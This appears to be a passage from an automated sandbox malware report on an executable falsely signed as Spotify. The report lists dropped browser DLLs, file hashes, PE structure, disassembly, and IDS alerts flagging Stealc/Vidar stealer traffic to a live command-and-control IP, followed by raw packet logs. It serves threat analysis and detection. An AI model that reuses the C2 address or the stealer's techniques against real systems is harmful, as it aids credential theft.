Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:Ott888888888888888888888888888888888888888888888888888888888888L:wl
MD5:	282900A825A84F25D4FCDC1E8C3CF627
SHA1:	212CB8340DB1876201AFD3D0F90E270066E59BE4
SHA-256:	C7DE0B40A7AFE100940E7C3DE85516456DD77D7DEF537586F5921E382909B9BE
SHA-512:	92ABD24D30EA1AC1AD8F963DE19BF654072B153704C48468C3619F70C5AC21EB1C46225B7B7146869C6625AFA985E6A4F085C45EA2653709B91F7DDA628E1890
Malicious:	false
Preview:	YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.418958359739358
Encrypted:	false
SSDEEP:	6144:rSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:WvloTMW+EZMM6DFyn03w
MD5:	442BE31779CED37E8D1EBD8624CDAC65
SHA1:	76619C0C7F7BB9AAB0A85EFA950647C5A5F34370
SHA-256:	75A635DBAA25C38F8C3DC2FAE1F4686F1B74278B810561AB1E795909F70086C0
SHA-512:	866DC6F871B0389E32E44E8D10F9FA67D9B5141A5E2BA68B8E1CE93724B783BC112FCCBE127A975575AB7BC87470F8C74F092F7A152AF47BDE7A85A94AAA729D
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.e$rV...............................................................................................................................................................................................................................................................................................................................................~.3F........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.754205669718061
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	594'296 bytes
MD5:	e92d327838d5f6952f612283a2425e24
SHA1:	60c73cd8fb4f10628072f055770b472bb47db22f
SHA256:	25f720e9b969bdbece357a4704d4575a47ab8230affefbc2bfc467cb317835f1
SHA512:	5fb955197e5c18e91e6da9f12390a6cfc52317ef3905c4ed8a69b0b42d75588c69435cfa2bcebef3a9d40d6e95d7299935cf731cf2bde59d264fa9da5dabe462
SSDEEP:	12288:+KjyIfgXP6uLj9n9SAz0ciC03e2FcyPvIdbDDhaqfnGidrKh:+Klfgfzn8AzqCONFXPv8DdrDY
TLSH:	58C4F11174C0C072D57324321AE4EAB4AF7EF8714F655E9F63A44B7E4F30291AB216AB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9...WU..WU..WU.TT..WU.RTR.WU.ST..WU.VT..WU..VU..WU.cTT..WU.cST..WU.cRT..WU.b^T..WU.b.U..WU.bUT..WURich..WU........PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x406c99
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67032ED8 [Mon Oct 7 00:44:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	a60bdb87c5f6c8156150002e03d82eb0

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	22/09/2022 02:00:00 20/10/2023 01:59:59
Subject Chain	CN=Spotify AB, O=Spotify AB, L=Stockholm, C=SE, SERIALNUMBER=5567037485, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=SE
Version:	3
Thumbprint MD5:	EF8873EED657F2DFE432077ADBAB8AFB
Thumbprint SHA-1:	3F76C6CC576963831FF44303BFCB98113C51C95E
Thumbprint SHA-256:	890C79F427B0C07DEF096FF66A402E9337F0F2D80DACA1256A7F572F7720DBAA
Serial:	04C530703A210EC1D6F83CB4FE1118C5

Entrypoint Preview

Instruction
call 00007F52B92DCF09h
jmp 00007F52B92DC46Fh
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F52B92DC60Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F52B92DC5FCh
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F52B92DC5FEh
add edx, 28h
cmp edx, esi
jne 00007F52B92DC5DCh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F52B92DC5EBh
push esi
call 00007F52B92DD21Dh
test eax, eax
je 00007F52B92DC612h
mov eax, dword ptr fs:[00000018h]
mov esi, 0048D96Ch
mov edx, dword ptr [eax+04h]
jmp 00007F52B92DC5F6h
cmp edx, eax
je 00007F52B92DC602h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F52B92DC5E2h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F52B92DC5F9h
mov byte ptr [0048D970h], 00000001h
call 00007F52B92DC8B3h
call 00007F52B92DF7D0h
test al, al
jne 00007F52B92DC5F6h
xor al, al
pop ebp
ret
call 00007F52B92E8234h
test al, al
jne 00007F52B92DC5FCh
push 00000000h
call 00007F52B92DF7D7h
pop ecx
jmp 00007F52B92DC5DBh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [0048D971h], 00000000h
je 00007F52B92DC5F6h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2b680	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8f000	0x1d5	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8e800	0x2978
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x90000	0x1ab4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x29ba0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x29ae0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x22000	0x128	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20e30	0x21000	5fa15f9c95ec25f604587c7ddfde7bad	False	0.5845614346590909	data	6.653286481141663	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x22000	0x9d24	0x9e00	340a9d7e620f559e1c8e7ef842cf8205	False	0.43510185917721517	data	4.9607359375763025	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2c000	0x62598	0x61800	d0f87a4ddc1672775e1a8144f185dfb4	False	0.9920072115384615	DOS executable (block device driver \377\377\377\377,32-bit sector-support)	7.99352049225108	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x8f000	0x1d5	0x200	bedff0b62d9114c7342e2e0a5da269f4	False	0.529296875	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x90000	0x1ab4	0x1c00	cdfacdef8968688061d6b4ff0dc3b793	False	0.7261439732142857	data	6.375628990391368	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x8f058	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T03:15:33.524581+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.5	49782	95.164.90.97	80	TCP
2024-10-07T03:15:34.150689+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	95.164.90.97	80	192.168.2.5	49782	TCP
2024-10-07T03:15:34.971620+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	95.164.90.97	80	192.168.2.5	49782	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 03:15:01.868746996 CEST	49674	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:01.915272951 CEST	49675	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:02.431107044 CEST	49673	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:11.477905035 CEST	49674	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:11.524624109 CEST	49675	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:12.040347099 CEST	49673	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:13.418951035 CEST	443	49704	23.1.237.91	192.168.2.5
Oct 7, 2024 03:15:13.419070959 CEST	49704	443	192.168.2.5	23.1.237.91
Oct 7, 2024 03:15:18.859369040 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:18.859407902 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:18.859668016 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:18.860156059 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:18.860167980 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.504779100 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.504913092 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.508236885 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.508254051 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.508650064 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.519404888 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.563441992 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.616724014 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.616756916 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.616805077 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.616873026 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.616873026 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.616894960 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.616949081 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.704118013 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.704188108 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.704237938 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.704257011 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.704415083 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.704415083 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.705481052 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.705533028 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.705581903 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.705590010 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.705640078 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.705979109 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.790395975 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.790460110 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.790530920 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.790549994 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.790580988 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.790893078 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.791450024 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.791500092 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.791580915 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.791588068 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.791600943 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.791645050 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.793442965 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.793490887 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.793541908 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.793548107 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.793592930 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.793611050 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.793611050 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.793628931 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.793644905 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.793661118 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.793694019 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.793700933 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.794429064 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.794429064 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.878304958 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.878382921 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.878437042 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.878453016 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.878531933 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.878628969 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.878628969 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.878628969 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.878647089 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.878669977 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.878715992 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.878778934 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.879079103 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.879123926 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.879188061 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.879194021 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.879403114 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.879403114 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.880115986 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.880162001 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.880285025 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.880285978 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.880292892 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.880479097 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.881283045 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.881334066 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.881640911 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.881640911 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.881648064 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.881977081 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.882199049 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.882246017 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.882270098 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.882276058 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.882328987 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.882328987 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.882389069 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.882481098 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.882487059 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.882551908 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.882633924 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.882761002 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.882761002 CEST	49706	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.882776976 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.882783890 CEST	443	49706	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.939090967 CEST	49707	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.939167976 CEST	443	49707	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.939251900 CEST	49707	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.940824986 CEST	49708	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.940912962 CEST	443	49708	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.941692114 CEST	49708	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.941912889 CEST	49708	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.941931963 CEST	443	49708	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.942089081 CEST	49707	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.942106009 CEST	443	49707	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.946243048 CEST	49709	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.946295023 CEST	443	49709	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:19.946377993 CEST	49709	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:19.946798086 CEST	49709	443	192.168.2.5	13.107.246.45
